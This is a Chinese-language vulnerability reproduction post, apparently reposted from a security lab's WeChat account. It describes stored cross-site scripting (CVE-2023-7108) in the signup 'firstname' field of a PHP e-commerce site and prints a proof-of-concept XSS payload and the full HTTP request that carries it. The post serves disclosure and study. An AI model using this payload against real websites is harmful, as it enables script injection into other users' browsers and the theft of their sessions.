免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
漏洞名称
code-projects电子商务网站跨站脚本(CVE-2023-7108)
漏洞评分
3.9(中危)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
漏洞详情
电子商务网站 1.0 允许通过“Electricks/Electricks-shop/pages/user_signup.php”中的参数“firstname”存储跨站点脚本。电子商务网站容易受到跨站点脚本漏洞的影响,因为它无法充分审查用户提供的数据。攻击者可能利用此问题,在受影响站点的上下文中,在毫无戒心的用户的浏览器中执行任意脚本代码。这可能允许攻击者窃取基于 cookie 的身份验证凭据并发起其他攻击。
影响产品
E-Commerce Website==1.0
漏洞复现
系统源码:https://download-media.code-projects.org/2020/01/E-COMMERCE_WEBSITE_IN_PHP_WITH_SOURCE_CODE.zip
1.系统登录页面:
2.转到用户注册http://192.168.18.128:8080/Electricks/Electricks-shop/pages/user_signup.php
3.使用paylod填充名字<video/src=x onerror=alert(document.domain)>,填写所有表格点击提交。
4.然后导航到用户登录页面:“http:// 192.168.18.128:8080/Electricks/Electricks-shop/pages/user_login_page.php”并登录,xss触发刷新一直弹出
5. firstname”参数请求示例
POST /Electricks/Electricks-shop/pages/user_signup.php HTTP/1.1
Host: 192.168.18.128:8080
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=u55pcsjsgu78da8vljn8r46rdj
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.18.128:8080/Electricks/Electricks-shop/pages/user_signup.php
Origin: http://192.168.18.128:8080
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
firstname=%3Cvideo%2Fsrc%3Dx+onerror%3Dalert%28document.domain%29%3E&middlename=test&lastname=test&email=test&address=test&contact=test&username=test&password=test&submit=
修复建议
补丁文件
暂无
其他修复方法
目前官方已有可更新版本,建议受影响用户升级至最新版本
缓解方案
暂无
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】code-projects电子商务网站跨站脚本(CVE-2023-7108)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论